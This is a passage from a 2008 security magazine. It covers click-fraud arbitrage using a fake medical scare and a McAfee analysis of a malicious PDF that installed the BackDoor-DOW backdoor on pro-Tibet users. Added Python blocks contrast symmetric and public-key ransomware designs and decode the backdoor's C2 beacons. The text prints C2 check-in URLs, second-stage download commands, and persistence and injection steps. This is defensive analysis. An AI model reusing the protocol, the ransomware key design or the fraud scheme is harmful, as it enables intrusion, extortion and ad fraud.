make it." Or perhaps from a system administrator: "There is a dangerous new computer virus, and our systems are not properly patched yet to defend against it. Please install the attached program on your computer right away to help us stay secure. Do this as soon as you can."

And what would happen if someone were to open or execute the attached file? Assuming that the email would not end up in the spam folder in the first place and that the anti-virus system would not catch it, we would have an infection—on a computer with access to sensitive data or to the corporate web site. What if some of that sensitive data were to make its way onto the Internet, maybe even onto the web site of the company itself? There would be a public uproar, and the stock price would suffer. Then the criminal would exercise his or her put options, cashing in on the previous bet that the stock of the company would go down in value. Doing so does nothing to make the attacker traceable, as every investor with put options would be in the same situation. Who is the criminal? Nobody would be able to tell.

BBB complaint case

BBB CASE #569822971
Complaint filed by: Michael Taylor
Business Name:
Complaint filed against:
Contact:
BBB Member:
Complaint status: -
Category: Contract Issues
Case opened date: 2/28/2008
Case closed date: -

*** Attached you will find a copy of the complaint. Please download and keep this copy so you can print it for your records.***

On February 26 2008, the consumer provided the following information: (The consumer indicated he/she DID NOT receive any response from the business.)

The form you used to register this complaint is designed to improve public access to the Better Business Bureau of Consumer Protection Consumer Response Center, and is voluntary. Through this form, consumers may electronically register a complaint with the BBB. Under the Paperwork Reduction Act, as amended, an agency may conduct or sponsor, and a person is not required to respond to, a collection of information unless it displays a currently valid OMB control number. That number is 502-793. © 2008 BBB.org, All Rights Reserved.

Figure 1: The Better Business Bureau scam. The email contains an infected attachment, which the attacker hopes will be opened by the recipient.

Faking the Clicks

Click fraud is another common type of online fraud. It takes advantage of the fact that when a consumer clicks on an advertisement, the advertiser pays a commission both to the web site displaying the ad and to the portal that provided the web site with the ad. Related types of fraud take advantage of advertising in which money is transferred when the consumer views a banner ad (whether or not he takes action), and other approaches in which a sale or other action is generated as a result of someone viewing an ad. The objective could be to profit from these transfers (criminals benefit when their web sites display the advertisements) or to drain the advertising budgets of competitors

(when the competitors are the advertisers from whom money is transferred). Often, criminals generate traffic in an automated manner, making it appear as though real people viewed the ads. Automation can include some form of malware, such as a botnet. Another common approach is for criminals to hire people to click on selected ads; this is referred to as a "click farm."

We will now describe how social engineering can be used in a new kind of click fraud attack. First, we'll begin by explaining a common scenario that is not click fraud:

• Scenario 1 Standard web site. Consider a legitimate web site that provides some service, and that displays advertisements which relate to this service. The contents of the ads are typically determined in an automated manner by the ad portals (for example, and Yahoo) by automatically reviewing the contents of the web site and selecting ads on topics related to the contents. If the web site is devoted to cooking, for example, then the ads may relate to pots, pans, and coffee machines. These sites also commonly place ads that bring in traffic. Thus we would expect to see ads that use keywords such as "knife," "Calphalon," "Teflon," and similar terms. There is nothing unusual about this type of site.

• Scenario 2 Using arbitrage. Consider now a second web site that has content which selects ads corresponding to the keywords "find a attorney." (We do mean "a," not "an." We'll explain why soon.) The site can do this by having lots of text (whether visible or not) that repeats this phrase. At the time of writing this article, the cost for this type of strategy falls in the range of $1.07 to $7.05 per keyword. The exact price depends on the venue, the time of the day, and, of course, the competing bids for the keywords, because all keyword prices are established by auctions. Thus, if a user clicks on an ad on this site, the owner of the corresponding ad would pay that amount to the portal, which in turn would transfer the amount—minus commission—to the web site that displayed the ad. Next, imagine that the site in question places an advertisement using the keyword "find an attorney." The only difference here is the article—"a" versus "an." The price range for this keyword is $0.87 to $3.82. We will assume that the web site pays $2.00 for each visitor it brings in, and receives $4.00 for each visitor who clicks an ad on the site. As long as 50 percent of the visitors who arrive via the $2.00 ad click on a $4.00 ad, the site makes a profit, without providing any service. This is referred to as keyword arbitrage. It is not quite click fraud, but it's close, as we shall see.

• Scenario 3 An attack using social engineering. Now we'll see how a criminal might use social engineering and extend the arbitrage technique to make a spectacular profit. Let's assume that the criminal produces a web site that generates the keyword "mesothelioma" (a rare form of cancer caused by asbestos exposure). As we write, this is a Google keyword worth $63.42. The criminal buys traffic for the keyword "asthma" ($0.10) to bring visitors to his site. If at least one in 634 people coming to his site clicks on the mesothelioma ad, he makes a profit. But why would someone do that? Assume that the web site content is an article, apparently written by a medical doctor, asking "Did you know that 10 percent of asthma sufferers are at risk to contract mesothelioma?" Although this is not a truthful statement, it will make many people who are concerned with asthma and who are unaware of what mesothelioma is do exactly what the criminal wants—click. Will half of all visitors fall for it? If so, a thousand visitors per day means roughly 500 clicks at $63.42 against $100 of bought traffic: a daily profit of more than $30,000. Even with less conspicuous keywords, the criminal can still make a pretty decent profit.

What makes the three scenarios differ is the intent—and the use of social engineering. From the ad providers' perspective, these three scenarios are very similar in structure. A visitor comes in, reads content, and clicks an ad. Although it is possible to match keywords coming in and going out to find anomalies, it is also possible for criminals to use one service provider to bring traffic in, and another one to carry traffic out. This strategy makes it hard to detect and stop this kind of attack, especially if it is carried out at small scale using a large number of sites.

Conclusion

Social engineering on the Internet is here to stay. We have already witnessed its effects through phishing scams, and we are starting to see how criminals use social engineering to improve the efficiency of spam and crimeware. Even more skilled applications than we currently see are just around the corner, we fear, as is the use of social engineering for other types of fraud—such as click fraud. We can design technical countermeasures with this in mind, and understanding the ways attacks are likely to occur will help improve the defenses. But we must also understand that our strategy requires better user interfaces, better procedures, stronger legislation, and improved education. The good guys still have a lot of work to do.

Dr. Markus Jakobsson is a Principal Scientist at Palo Alto Research Center. He researches phishing and countermeasures, click fraud, the human factor in security, cryptography, network security, and protocol design. He is an editor of Phishing and Countermeasures (Wiley, 2006) and co-author of Crimeware: Understanding New Attacks and Defenses (Symantec Press, 2008).
Image courtesy of PARC, photographer Brian Tramontana
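Returning to the Archiveus discussion in the Ransomware Fails section above: the following is an added example, not code from the article or from the Archiveus authors, that shows in working form why a Trojan carrying its own symmetric key is defeated by reverse engineering while one carrying only a public key is not. The "binaries" are constructed byte strings, the KEY_MARKER that stands in for the cross-references an analyst would follow to the key is an assumption, the stream cipher is a toy SHA-256 keystream, and the RSA keypair is a small textbook one generated in-process; none of this is the real malware's cryptography.

```python
# Added example, not code from the article or from the Archiveus authors: why a
# Trojan that carries its own symmetric key is defeated by reverse engineering
# while one that carries only a public key is not. The "binaries" are
# constructed byte strings, the stream cipher is a toy SHA-256 keystream and
# the RSA keypair is a small textbook one generated in-process.
import hashlib
import math
import secrets

KEY_MARKER = b"KEY:"  # assumed: stands in for the xrefs an analyst follows to the key

def keystream_xor(key: bytes, data: bytes) -> bytes:
    """Toy stream cipher: XOR with SHA-256(key || block counter); the same call
    encrypts and decrypts."""
    out = bytearray()
    for off in range(0, len(data), 32):
        block = hashlib.sha256(key + off.to_bytes(8, "big")).digest()
        out.extend(b ^ k for b, k in zip(data[off:off + 32], block))
    return bytes(out)

# Archiveus-style: the key the Trojan encrypts with travels inside the Trojan.
def build_symmetric_trojan(key: bytes) -> bytes:
    return b"MZ" + secrets.token_bytes(48) + KEY_MARKER + key + secrets.token_bytes(48)

def recover_symmetric_key(binary: bytes) -> bytes:
    """What the analysts did with Archiveus: lift the key out of the code."""
    idx = binary.index(KEY_MARKER) + len(KEY_MARKER)
    return binary[idx:idx + 32]

# Public-key variant: only (n, e) travels in the binary; d stays with the attacker.
def is_probable_prime(n: int, rounds: int = 16) -> bool:
    """Miller-Rabin with random bases."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def random_prime(bits: int) -> int:
    while True:
        cand = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(cand):
            return cand

def toy_rsa_keypair(bits: int = 160):
    """Textbook RSA, far too small for real use; n only has to exceed 2**128 so
    that a 16-byte session key fits in one block."""
    e = 65537
    while True:
        p, q = random_prime(bits // 2), random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and math.gcd(e, phi) == 1:
            return (p * q, e), (p * q, pow(e, -1, phi))

def build_hybrid_trojan(pub) -> bytes:
    n, e = pub
    return b"MZ" + secrets.token_bytes(48) + n.to_bytes(20, "big") + e.to_bytes(4, "big")

def infect_hybrid(pub, files: dict):
    """Runtime: fresh per-victim session key, files encrypted under it, the key
    wrapped under the attacker's public key. The session key is returned only
    so the demo can check that it never appears in the binary."""
    n, e = pub
    session = secrets.token_bytes(16)
    encrypted = {name: keystream_xor(session, data) for name, data in files.items()}
    wrapped = pow(int.from_bytes(session, "big"), e, n).to_bytes(20, "big")
    return encrypted, wrapped, session

def unwrap_session_key(priv, wrapped: bytes) -> bytes:
    """Only the holder of d can do this step."""
    n, d = priv
    return pow(int.from_bytes(wrapped, "big"), d, n).to_bytes(16, "big")

def demo() -> dict:
    files = {"report.doc": b"quarterly numbers", "notes.txt": b"call the bank"}  # constructed
    key = secrets.token_bytes(32)
    trojan = build_symmetric_trojan(key)
    locked = {n: keystream_xor(key, d) for n, d in files.items()}
    recovered = recover_symmetric_key(trojan)  # no private material needed
    sym_ok = all(keystream_xor(recovered, c) == files[n] for n, c in locked.items())
    pub, priv = toy_rsa_keypair()
    trojan2 = build_hybrid_trojan(pub)
    locked2, wrapped, session = infect_hybrid(pub, files)
    leaked = session in trojan2 or priv[1].to_bytes(20, "big") in trojan2
    attacker_ok = all(keystream_xor(unwrap_session_key(priv, wrapped), c) == files[n]
                      for n, c in locked2.items())
    return {"symmetric_key_recovered": sym_ok, "hybrid_secret_in_binary": leaked,
            "hybrid_attacker_can_decrypt": attacker_ok}

if __name__ == "__main__":
    print(demo())
```

The point the demo makes is the one the article makes: in the hybrid design the only secret that could unlock the files is d, and d is never shipped, so reverse engineering the sample yields nothing to distribute to victims. What the article adds, and the code cannot show, is that even this design fails at the ransom-collection step if the payment channel is traceable.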
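The arbitrage economics of Scenarios 2 and 3 above, together with the "match keywords coming in and going out" check the text mentions and the two-provider evasion it warns about, as an added example that is not code from the article or from any ad network. The site names, the baseline click rate, the flagging thresholds and the records themselves are constructed assumptions; the per-click prices are the article's figures.

```python
# Added example, not code from the article or from any ad network: the
# arbitrage economics of Scenarios 2 and 3 and the "keywords in versus
# keywords out" check the text mentions, run over constructed records. Site
# names, the baseline click rate and the flagging thresholds are assumptions;
# the per-click prices are the article's figures.
from dataclasses import dataclass

def breakeven_click_rate(cpc_in: float, cpc_out: float, commission: float = 0.0) -> float:
    """Fraction of bought visitors who must click an outbound ad for the site to
    break even; the portal's commission comes off the outbound payout."""
    return cpc_in / (cpc_out * (1.0 - commission))

def daily_profit(visitors: int, cpc_in: float, cpc_out: float,
                 click_rate: float, commission: float = 0.0) -> float:
    """Net per day: payout on the clicks the site sells minus the traffic it buys."""
    return visitors * (click_rate * cpc_out * (1.0 - commission) - cpc_in)

@dataclass
class BuySide:
    """The portal that sold the site its inbound traffic sees this."""
    provider: str
    site: str
    keyword: str
    cpc: float
    visits: int

@dataclass
class SellSide:
    """The portal that paid the site for outbound clicks sees this."""
    provider: str
    site: str
    keyword: str
    cpc: float
    clicks: int

def join_views(buys, sells, single_provider=None):
    """Pair each site's inbound and outbound records. With single_provider set,
    only that portal's own data is used, which is all one portal normally has;
    a site that buys from one portal and sells through another then has no
    inbound record and cannot be scored."""
    inbound = {b.site: b for b in buys if single_provider in (None, b.provider)}
    outbound = {s.site: s for s in sells if single_provider in (None, s.provider)}
    return [(inbound[site], outbound[site]) for site in sorted(inbound) if site in outbound]

def flag_arbitrage(pairs, baseline_ctr=0.02, min_value_ratio=2.0):
    """Flag sites whose outbound keyword is worth far more than the inbound one
    and whose click-through beats both the arbitrage break-even and a multiple
    of what honest content earns."""
    flagged = []
    for buy, sell in pairs:
        ctr = sell.clicks / buy.visits if buy.visits else 0.0
        ratio = sell.cpc / buy.cpc
        if ratio >= min_value_ratio and ctr >= breakeven_click_rate(buy.cpc, sell.cpc) \
                and ctr >= 5 * baseline_ctr:
            flagged.append(buy.site)
    return flagged

# Constructed records: one honest site, the two arbitrage sites of the article,
# and one that splits its buying and selling across portals.
BUYS = [
    BuySide("PortalA", "cooking.example", "knife", 0.50, 1000),
    BuySide("PortalA", "attorneys.example", "find an attorney", 2.00, 1000),
    BuySide("PortalA", "asthma-facts.example", "asthma", 0.10, 1000),
    BuySide("PortalB", "split.example", "asthma", 0.10, 1000),
]
SELLS = [
    SellSide("PortalA", "cooking.example", "calphalon", 0.80, 20),
    SellSide("PortalA", "attorneys.example", "find a attorney", 4.00, 520),
    SellSide("PortalA", "asthma-facts.example", "mesothelioma", 63.42, 500),
    SellSide("PortalA", "split.example", "mesothelioma", 63.42, 500),
]

if __name__ == "__main__":
    print("break-even, scenario 2:", breakeven_click_rate(2.00, 4.00))
    print("break-even, scenario 3:", breakeven_click_rate(0.10, 63.42))
    print("daily profit, scenario 3:", daily_profit(1000, 0.10, 63.42, 0.5))
    print("PortalA alone flags:", flag_arbitrage(join_views(BUYS, SELLS, "PortalA")))
    print("joined views flag:  ", flag_arbitrage(join_views(BUYS, SELLS)))
```

Run on PortalA's data alone, split.example is invisible because its inbound traffic was bought elsewhere; only when the two portals' views are joined does it score like the other arbitrage sites. That is the detection gap the article describes, and it is why the check has to be run on data shared across providers rather than by each portal in isolation.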


A Prime Target for Social Engineering Malware

By Elodie Grandjean

Malware writers often use social engineering methods to directly infect a system or host, or to start a cascade of downloading and executing malware.

Most of us have received an email containing a malicious attachment or URL while reading about an important security update or a long-lost friend who wants to re-establish contact.

Don't be fooled into thinking that email is the only attack vector for spreading malware via social engineering tricks. There are plenty of other ruses, including using popular or urgent news services. A friend's compromised system might send you a message with a URL pointing to a file and asking you to look at some pictures. The problem is that you trust the contact and are unaware that the other system is infected. In many cases, the URL points to malware.

Other malware uses social engineering to steal confidential information such as login credentials, credit card numbers, and so on. These techniques are typically used in phishing attacks or server intrusions.

The most common social engineering tricks malware writers use are for "adult" services. Here's a list of others, though it's hardly exhaustive:

• Pornographic links and images
• Using a female name in the sender field
• Political agendas, including solicitations for contributions in the name of a popular candidate
• Fake emails from banks, online payment services, and other financial services. These request a confirmation or an update of login credentials or credit card information.
• Threatening emails, mentioning jail sanctions or jury-duty procedures
• Free games and screensavers containing a Trojan, or free anti-spyware tools, which are often rogue programs themselves
• Big events, such as sports and extreme weather disasters
• Celebrity names and reports on their adventures and misbehavior
• Potentially trusted or secret relationships, such as affiliation with social networking web sites, fake friends, school classmates or relatives, and secret lovers

The list of topics is potentially limitless, and there's plenty of appeal to large groups of global users. The list also highlights the fact that social engineering can often target national or even local groups of users. For example, a global attack referencing a popular social networking web site may bring responses from around the world to the malware author; on the other hand, a similar attack on the U.S. presidential election will likely ensnare only American victims.

Why Pick on the Olympics?

China has been in the spotlight for months due to the 2008 Olympic Games in Beijing. Media interest has been huge, covering athletes, fans, infrastructure, environment, and politics, among other topics.

On the political front, protests over the status of Tibet have been a highly sensitive topic; many "Free Tibet" organizations around the world have benefited from the Olympics spotlight. Other issues, regarding slave labor and human rights, have also raised their profile. And many Internet users are interested enough to read news and other stories online.

The Olympic torch became a hot symbol for protesters in the run-up to the games. The torch's travel around the world created huge media coverage and developed even more interest and involvement among both fans and opponents. This growing interest also increased the size of the potential attack area that malware writers could exploit.

Sampling Victims

A social engineering attack usually needs to "sample" its victims beforehand in order to succeed. Let's see who the potential victims are of an attack using the China-Tibet conflict or the Olympic Games as a lure.

We've already seen individuals from pro-Tibet groups receive emails containing a CHM (compiled HTML help), PDF, PPT, XLS, or DOC attachment related to the Tibet situation, China in general, or the Olympics. All of these emails appeared to have been sent from a trusted organization or person. It's likely these users were accustomed to receiving such documents from their supporters and were perhaps not very vigilant. These particular attachments were malicious: they used various Microsoft Compiled HTML Help, Adobe Acrobat, Microsoft Excel, Microsoft PowerPoint, or Microsoft Word vulnerabilities to drop and silently execute embedded executable files. At this point the targeted attack area was relatively small, but the media coverage of Tibet protests helped to ignite the fuse. Later we witnessed some legitimate web sites devoted to supporting Tibet being hacked to embed the Fribet Trojan,1 which can download itself onto visitors' machines by exploiting vulnerabilities in web browsers.

At this point, the victim base increased from targeted organizations and their supporters to anyone curious about conditions in Tibet. Again, media attention aided this growth in the vulnerable population.

Next, malware writers took advantage of the Olympic Games themselves to propagate social engineering attacks with the appearance of the pro-Tibet rootkit.2 This malicious set of files operated under cover of a movie file ridiculing the efforts of a Chinese gymnast; while the cartoon runs, several malicious files silently drop and a rootkit is installed on the victim's computer to hide them.

Using the Olympic Games as the social engineering focus allowed the malware authors to target many sports enthusiasts, as well as all the previously targeted people who were interested in the Tibet-China conflict.

Case Study: An Olympics Malware Attack

We recently received the PDF file declaration_olympic_games_eng.pdf, which was initially emailed to a pro-Tibet group. (See Figure 1.) This document seemed innocent because when the application opened, this text appeared and nothing crashed or immediately went awry. Thus, most people did not suspect any malicious activity. However, in the background, some malicious files were silently created on the victims' machines. Let's see exactly how the attack works.

In fact declaration_olympic_games_eng.pdf is an empty PDF file that exploits a vulnerability in Acrobat to drop and execute the first part of the malicious package. This malicious executable file (detected as BackDoor-DOW)3 is embedded in encrypted form at the location shown in the hex editor in Figure 2 (next page).

Figure 3 (next page) shows the first bytes of the embedded file once decrypted.

This executable file drops the legitimate PDF file book.pdf, which is the document displayed when we execute the first file. The dropper looks for the process AcroRd32.exe in the list of active processes, finds the directory where Acrobat is installed, and then opens book.pdf. Figure 4, next page, shows the code in the dropper file that is responsible for this action.

The malware also drops another executable file, book.exe, which copies itself to %ALLUSERSPROFILE%\Application Data\msmsgs.exe and creates a new Windows service.4 This new service goes by the service and display name "Logical Disk Manager Service" and ensures that Windows will automatically run the Trojan at start-up. The name is chosen to blend in with the legitimate Logical Disk Manager service; the giveaway is the binary path, an msmsgs.exe under Application Data, not the name.

The malware even has a "Plan B" for hooking the startup process: if it fails to create the service, it adds a new registry value, Windows Media Player, which points to msmsgs.exe. Windows Media Player is added to the following start-up key in the Windows registry:5 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. Here too, the value name is cover; the data it points to is what to check. The Trojan also creates two files containing some encrypted data:

• C:\WINDOWS\jwiev.log.bak
• C:\WINDOWS\clocks.avi.bak

Figure 1: Pro-Tibet supporters recently received this apparently legitimate file as an email attachment.

Sponsor's declaration of responsibility at the 2008 Beijing Olympic Games

WITH REFERENCE TO, and consistent with, our obligations under the Olympic Charter, the undersigned sponsor of the 2008 Beijing Olympic Games hereby declares: We reaffirm our commitment to the "harmonious development of man, with a view to promoting a peaceful society concerned with the preservation of human dignity," as set forth in the Olympic Charter, and We acknowledge that sponsorship of the Olympic Games carries certain responsibilities, including the responsibility of implementing our sponsorship and communications programs in a manner that promotes awareness of basic human rights such as the right to free speech, and We are fully aware of the assurance made by the government of the People's Republic of China to the Olympic Committee to improve its human rights record as a condition for hosting the Olympic Games and recognize the worldwide concerns expressed about China's human rights record.

IN FURTHERANCE TO THE ABOVE, we agree to demonstrate our commitment to human rights at the 2008 Beijing Olympics by: FIRST, making bona fide good faith efforts to raise the issue of human rights with our Chinese contacts and to publicly report on our efforts to do so, and SECOND, designating a high-level executive within our organization to monitor every aspect of our activities associated with the Olympics and to assure that our actions properly reflect our commitment to human dignity and human rights, and THIRD, establishing a fund through which contributions can be made to prisoners of conscience in China, and their families, as well as to those persecuted in connection with the 2008 Olympic Games, and FOURTH, presenting a corporate resolution to our Board of Directors resolving to adopt this Declaration, and the principles of human rights and human dignity upon which it is based, prior to the commencement of the 2008 Olympic Games in Beijing, and FIFTH, incorporating this Declaration of Responsibility into our commercial messages. DECLARED BY

Name/Title Date
Finally, book.exe cleans up by creating a batch file that deletes it, and then self-terminates. From that point, the baton is passed to msmsgs.exe.

Msmsgs.exe temporarily drops another file at the following location: C:\Program Files\WindowsUpdate\Windows Installer.exe. Just before being deleted, Windows Installer.exe drops two copies of a DLL file into:

• C:\Documents and Settings\All Users\DRM\drmv021.lic
• C:\Documents and Settings\All Users\DRM\avp01.lic

The malware injects itself into svchost.exe to hide its activity. It launches a new instance of svchost.exe (the legitimate system process),6 allocates a block of memory within the address space of this new process, writes a copy of itself into the virtual address space of svchost.exe (at the address 0x400000, the default image base of a Windows executable, so the copy needs no relocation), and runs the malicious code by creating a remote thread. A fresh svchost.exe whose parent is not services.exe is the visible trace of this step.

The malicious code injected into svchost.exe calls the workFunc() function from avp01.lic, which connects to a remote server and sends three requests:

• http://www1.palms[removed]/ld/v2/loginv2.asp?hi=2wsdf351&x=0720080510150323662070000000&y=192.168.1.122&t1=ne
• http://www1.palms[removed]/ld/v2/votev2.asp?a=7351ws2&s=0720080510150323662070000000&t1=ne
• http://www1.palms[removed]/ld/v2/logoutv2.asp?p=s9wlf1&s=0720080510150323662070000000&t1=ne

The x and y parameters may differ from one victim to the next. The value of x (sent as s by the other two scripts) is formed by concatenating "07" with the exact date (2008/05/10) and time (15:03:23) at which the file clocks.avi.bak was created, followed by the hard-coded string "662070000000." The value of y is the IP address of the victim's computer.

Figure 2: This malicious PDF carried an encrypted copy of the malware BackDoor-DOW.

Figure 3: The unencrypted version of BackDoor-DOW.

Figure 4: The malware looks for Acrobat Reader (AcroRd32.exe) and then opens the innocent file book.pdf.

FALL 2008 19

The three server-side scripts loginv2.asp, votev2.asp, and logoutv2.asp inform the attacker that a new compromised machine is available, check whether a command has been sent from the attacker, and stop the backdoor, respectively. To read the response sent after connecting to one of the server-side scripts, the Trojan creates a copy of the returned web page in the following folder: C:\Program Files\InstallShield Installation Information\ The filename consists of a six-digit random value and, once read, the file is deleted. loginv2.asp and logoutv2.asp return only blank web pages (with tags), but votev2.asp returns either code that roughly means “The backdoor is ready but there is no action needed at the moment” (@n4@300@) or a command such as one of the following:
• @n11@http://www1.palms[removed]/ld/v2/sy64.jpg@%SystemRoot%\Dnservice.exe@218c663bea3723a3dc9d302f7a58aeb1@
• @n11@http://www1.palms[removed]/ld/v2/200764.jpg@%SystemRoot%\Soundmax.exe@5f3c02fd4264f3eaf3ceebfe94ffd48c@

Either command roughly means “download the aforementioned file with the .JPG extension and drop it in the %SystemRoot% folder on the victim’s machine using the provided executable filename.” The last part of the response is the MD5 hash of the file that is going to be downloaded (and that will be used to check the file’s integrity). Note that the hash authenticates nothing: it only lets the backdoor detect a corrupt download, since anyone who can alter the file can also alter the command that carries the hash.

During this entire process, victims are none the wiser about what is happening in the background. While they read and fill in the declaration that has been dropped by the malicious PDF file, the backdoor is silently installed on their computers, waiting for commands from the attacker. At this point, any other malicious files can be downloaded to the machine as well, as it is fully compromised.

Rogue Software and Sites

Creative hooks for social engineering attacks are not limited to sporting events. For several months, we have noticed an increase in malicious software posing as applications from “security” vendors. These programs lure victims into infecting their computers by appearing to be helpful. Several variants of the FakeAlert7 Trojan warn their victims that their machines are infected (don’t you love the irony!) and provide information (often malicious URLs) for retrieving “anti-spyware” tools, which are in fact rogue applications themselves.

Given the importance of keeping your software current, it wasn’t long before rogue “update” web sites began to imitate the real Windows Update site. We recently discovered a sophisticated method using DLL components, linked to a fake Windows Update site, that prevented the browser from warning users when a remote web server used an invalid certificate for a secure (HTTPS) web site. The purpose of this attack was to disguise malicious files as real Windows updates that victims would download and execute.

This malware trend may spread in the upcoming months. It is a serious concern because most people trust security vendors; if that trust were lost, many users would be even more likely to suffer.
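Returning to the BackDoor-DOW check-in described above: what follows is an added example, not code from the article or from the malware, that decodes the beacon URLs and the votev2.asp responses exactly as the text lays them out, the way an analyst would when reading proxy logs for this family. The host c2.example.invalid is a placeholder for the C2 host the article redacts, and the sample URLs and response strings are constructed from the article’s examples.

```python
"""Decoder for the BackDoor-DOW check-in and command protocol (added example)."""
import hashlib
import re
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

C2_HOST = "c2.example.invalid"  # placeholder: the article redacts the real host

# Script name -> what the request means in the backdoor's life cycle.
SCRIPT_ACTIONS = {
    "loginv2.asp": "login",    # announce a new compromised machine
    "votev2.asp": "poll",      # ask whether a command is waiting
    "logoutv2.asp": "logout",  # stop the backdoor
}

# x/s = "07" + creation timestamp of clocks.avi.bak (YYYYMMDDhhmmss) + fixed suffix
X_PATTERN = re.compile(r"07(\d{14})662070000000")


def decode_x(value):
    """Recover the infection timestamp the backdoor encodes in x (or s)."""
    m = X_PATTERN.fullmatch(value)
    if m is None:
        raise ValueError("parameter does not match the BackDoor-DOW layout")
    return datetime.strptime(m.group(1), "%Y%m%d%H%M%S")


def parse_beacon(url):
    """Classify one check-in URL and pull out the victim identifiers."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1]
    if script not in SCRIPT_ACTIONS:
        raise ValueError("not a BackDoor-DOW script: " + script)
    q = parse_qs(parts.query)
    stamp = (q.get("x") or q.get("s") or [None])[0]  # login uses x, the others s
    return {
        "action": SCRIPT_ACTIONS[script],
        "infection_time": decode_x(stamp) if stamp else None,
        "victim_ip": q.get("y", [None])[0],          # only login carries y
    }


def parse_vote_response(body):
    """votev2.asp answers '@n4@300@' (idle) or '@n11@<url>@<drop path>@<md5>@'."""
    fields = body.strip().split("@")          # '@n4@300@' -> ['', 'n4', '300', '']
    if fields[1:3] == ["n4", "300"]:
        return {"command": "idle"}
    if len(fields) >= 6 and fields[1] == "n11":
        url, dest, digest = fields[2], fields[3], fields[4].lower()
        if not re.fullmatch(r"[0-9a-f]{32}", digest):
            raise ValueError("malformed md5 in download command")
        return {"command": "download", "url": url, "dest": dest, "md5": digest}
    raise ValueError("unrecognised votev2.asp response: " + body)


def verify_download(data, expected_md5):
    """The backdoor's own integrity check: md5 of the dropped file vs the command."""
    return hashlib.md5(data).hexdigest() == expected_md5.lower()


# Constructed samples, shaped like the article's examples.
SAMPLE_BEACONS = [
    f"http://{C2_HOST}/ld/v2/loginv2.asp?hi=2wsdf351&x=0720080510150323662070000000&y=192.168.1.122&t1=ne",
    f"http://{C2_HOST}/ld/v2/votev2.asp?a=7351ws2&s=0720080510150323662070000000&t1=ne",
    f"http://{C2_HOST}/ld/v2/logoutv2.asp?p=s9wlf1&s=0720080510150323662070000000&t1=ne",
]
SAMPLE_COMMAND = (f"@n11@http://{C2_HOST}/ld/v2/sy64.jpg@%SystemRoot%\\Dnservice.exe"
                  "@218c663bea3723a3dc9d302f7a58aeb1@")

if __name__ == "__main__":
    for url in SAMPLE_BEACONS:
        print(parse_beacon(url))
    print(parse_vote_response("@n4@300@"))
    print(parse_vote_response(SAMPLE_COMMAND))
```

Feeding real proxy logs through parse_beacon gives the infection time and internal IP of every victim that checked in, and parse_vote_response tells you which hosts were told to fetch a second stage and where it was dropped.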

Conclusion

Sporting events are frequently used as bait for social engineering attacks. That malware developers would turn their attention to the Beijing Olympics was easy to foresee. The event offered all the ingredients for a perfect recipe: small targeted attacks grew larger in scope as the number of victims interested in the topic increased. This growth was possible due to closely related issues; concern over Tibet led to the global torch relay, which led to the Olympics themselves. The media often plays an important role in raising the profile of an event. Their efforts lead some victims to search for further information, but they often stumble onto related but malicious web sites or, more commonly, legitimate web sites that are compromised and silently infect unsuspecting visitors.

These attacks are so elaborate that the victims will probably not suspect anything. As we learned from the case study, we face threats not only from unknown senders and email attachments with an .exe extension. Legitimate documents (Microsoft Word, Microsoft Excel, Microsoft PowerPoint, and others) can also be malicious. It is partly because of the naive belief that data files cannot hold malware that these attacks are so successful. Ultimately, people tend to be more aware of common tricks, which in turn forces attackers to become more creative and nefarious in their techniques to remain victorious over their victims.

Elodie Grandjean has been working as a Virus Researcher for McAfee Avert Labs in France since January 2005. She has more than five years of experience in reverse engineering on Windows platforms. Grandjean specializes in anti-reverse-engineering techniques, unpacking, and decryption, and has written for French security magazine MISC: Multi-System & Internet Security Cookbook. When she is not analyzing malware or programming, Grandjean is probably browsing the Internet, unless she is attending a live concert or enjoying a Belgian beer in a pub with her friends.

endnotes
1 Fribet, McAfee VIL. http://vil.nai.com/vil/content/v_144356.htm
2 “Is Malware Writing the Next Olympic Event?” McAfee Avert Labs Blog. http://www.avertlabs.com/research/blog/index.php/2008/04/14/is-malware-writing-the-next-olympic-event/
3 “BackDoor-DOW,” McAfee VIL. http://vil.nai.com/vil/content/v_144476.htm
4 “Services,” Microsoft Developer Network. http://msdn.microsoft.com/en-us/library/ms685141(VS.85).aspx
5 “Registry,” Microsoft Developer Network. http://msdn.microsoft.com/en-us/library/ms724871(VS.85).aspx
6 “A description of Svchost.exe in Windows XP Professional Edition,” Microsoft Help and Support. http://support.microsoft.com/kb/314056/en-us
7 FakeAlert-B, McAfee VIL. http://vil.nai.com/vil/content/v_139058.htm
  FakeAlert-C. http://vil.nai.com/vil/content/v_139219.htm
  FakeAlert-D. http://vil.nai.com/vil/content/v_140346.htm
  FakeAlert-D!56c05f7f. http://vil.nai.com/vil/content/v_142850.htm
  FakeAlert-H. http://vil.nai.com/vil/content/v_141377.htm
  FakeAlert-I. http://vil.nai.com/vil/content/v_141466.htm
  FakeAlert-G. http://vil.nai.com/vil/content/v_141163.htm
  FakeAlert-M. http://vil.nai.com/vil/content/v_142807.htm
  FakeAlert-Q. http://vil.nai.com/vil/content/v_143088.htm
  FakeAlert-R. http://vil.nai.com/vil/content/v_143102.htm
  FakeAlert-S.dll. http://vil.nai.com/vil/content/v_143110.htm
  FakeAlert-T. http://vil.nai.com/vil/content/v_143406.htm
  Generic FakeAlert.a. http://vil.nai.com/vil/content/v_143470.htm

Vulnerabilities in the Equities Markets

By Anthony Bettini

The recent credit turmoil in the equities and derivatives markets has put significant focus on many facets of the financial industry, including regulatory control structures, ratings agencies, hedge funds, private equity, pension funds, and other market makers.

With this constant media attention, people in related fields (bioinformatics, computer science, and so on) are beginning to take a closer look at financial engineering.

